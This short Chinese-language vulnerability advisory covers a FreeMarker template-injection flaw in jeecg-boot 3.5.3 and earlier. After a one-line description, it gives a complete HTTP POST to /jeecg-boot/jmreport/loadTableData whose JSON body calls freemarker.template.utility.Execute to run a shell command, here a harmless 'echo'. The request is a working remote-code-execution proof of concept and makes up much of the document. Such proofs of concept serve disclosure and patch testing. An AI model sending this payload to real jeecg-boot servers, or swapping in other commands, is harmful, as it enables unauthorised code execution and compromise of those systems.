漏洞描述
jeecg-boot是一款基于代码生成器的智能开发平台。 jeecg-boot 3.5.3及之前版本存在安全漏洞,该漏洞源于存在SSTI注入漏洞。攻击者可利用该漏洞通过特制的HTTP请求对/jmreport/loadTableData组件执行任意代码。
POST /jeecg-boot/jmreport/loadTableData HTTP/1.1
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 174
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
{"dbSource":"","sql":"select '<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"echo 8888888888\")}'","tableName":"test_demo);","pageNo":1,"pageSize":10}